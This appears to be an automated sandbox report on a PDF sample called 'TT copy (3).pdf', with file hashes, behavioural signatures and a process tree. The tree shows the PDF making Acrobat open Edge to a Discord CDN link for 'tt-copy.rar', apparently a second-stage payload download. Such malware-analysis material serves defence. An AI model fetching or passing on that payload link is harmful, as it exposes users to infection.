Resubmissions
08-04-2022 08:16
220408-j6ez3sffgr 307-04-2022 11:36
220407-nqzf1afeb8 607-04-2022 11:31
220407-nm4asacchn 3Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220331-en -
submitted
07-04-2022 11:36
Behavioral task
behavioral1
Sample
TT copy (3).pdf
Resource
win7-20220331-en
Behavioral task
behavioral2
Sample
TT copy (3).pdf
Resource
win10v2004-20220331-en
General
-
Target
TT copy (3).pdf
-
Size
84KB
-
MD5
29cee601ffd40bcbdded7b6b1ecb59c5
-
SHA1
57551f4ba5b1da74f4d1890fe1ec25b4046e8d96
-
SHA256
ec2917bf44eeb0bed1da25d1c37e7051f8b00916cb4606e7dad01a8fef691ee4
-
SHA512
8b6b77627f6b13eeaeb058640628c2583847dece5f565da9d1aea2c54210ea655d68aaa20fc44ea44ac17b1ba46fd73ffb84cbc157af28f9d025f82b75ae73c1
Malware Config
Signatures
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\b636dc00-35eb-4fec-87ab-78b640b69348.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220407133746.pma setup.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 8 IoCs
Processes:
msedge.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1082102374-1487407228-1886994731-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Suspicious behavior: EnumeratesProcesses 32 IoCs
Processes:
msedge.exemsedge.exeAcroRd32.exemsedge.exemsedge.exeidentity_helper.exemsedge.exepid process 3576 msedge.exe 3576 msedge.exe 4612 msedge.exe 4612 msedge.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 3148 msedge.exe 3148 msedge.exe 4672 msedge.exe 4672 msedge.exe 5412 identity_helper.exe 5412 identity_helper.exe 5528 msedge.exe 5528 msedge.exe 5528 msedge.exe 5528 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe -
Suspicious use of FindShellTrayWindow 19 IoCs
Processes:
AcroRd32.exemsedge.exepid process 2152 AcroRd32.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe 4612 msedge.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
AcroRd32.exeAdobeARM.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exepid process 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 2152 AcroRd32.exe 1860 AdobeARM.exe 2440 OpenWith.exe 1588 OpenWith.exe 4604 OpenWith.exe 5208 OpenWith.exe 5088 OpenWith.exe 5504 OpenWith.exe 5504 OpenWith.exe 5504 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
AcroRd32.exemsedge.exeRdrCEF.exedescription pid process target process PID 2152 wrote to memory of 4268 2152 AcroRd32.exe RdrCEF.exe PID 2152 wrote to memory of 4268 2152 AcroRd32.exe RdrCEF.exe PID 2152 wrote to memory of 4268 2152 AcroRd32.exe RdrCEF.exe PID 2152 wrote to memory of 3112 2152 AcroRd32.exe RdrCEF.exe PID 2152 wrote to memory of 3112 2152 AcroRd32.exe RdrCEF.exe PID 2152 wrote to memory of 3112 2152 AcroRd32.exe RdrCEF.exe PID 2152 wrote to memory of 4612 2152 AcroRd32.exe msedge.exe PID 2152 wrote to memory of 4612 2152 AcroRd32.exe msedge.exe PID 4612 wrote to memory of 4648 4612 msedge.exe msedge.exe PID 4612 wrote to memory of 4648 4612 msedge.exe msedge.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 32 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe PID 4268 wrote to memory of 208 4268 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\TT copy (3).pdf"1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140432⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=84052A6AD70ABBB895F46EFE3245F266 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵PID:32
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=B8789043D0D5863280F197B66404F5F7 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=B8789043D0D5863280F197B66404F5F7 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:13⤵PID:208
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=233354DAA414ECBE4AAFBE8B00729A0A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=233354DAA414ECBE4AAFBE8B00729A0A --renderer-client-id=4 --mojo-platform-channel-handle=2164 --allow-no-sandbox-job /prefetch:13⤵PID:3140
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A133BA5535E15D0E772157B9588CFC01 --mojo-platform-channel-handle=2432 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵PID:3540
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3738A1CD97B866D40BB6B2524A824A8D --mojo-platform-channel-handle=2684 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵PID:1140
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E4B9D70B92AFDFAB2EF246064F7BDB71 --mojo-platform-channel-handle=1960 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:23⤵PID:4908
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140432⤵PID:3112
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/958958106811977752/961145090439512094/tt-copy.rar2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8a11946f8,0x7ff8a1194708,0x7ff8a11947183⤵PID:4648
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:23⤵PID:1852
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:3576 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:83⤵PID:3688
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:13⤵PID:1772
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:13⤵PID:4344
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:13⤵PID:3236
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:13⤵PID:3152
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:13⤵PID:4620
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6076 /prefetch:83⤵PID:2184
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6220 /prefetch:83⤵PID:4156
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3728 /prefetch:83⤵PID:4824
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:13⤵PID:1604
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4216 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4672 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3148 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,6337289070323333756,44735679116746658,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6880 /prefetch:83⤵PID:3148
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
PID:1420 -
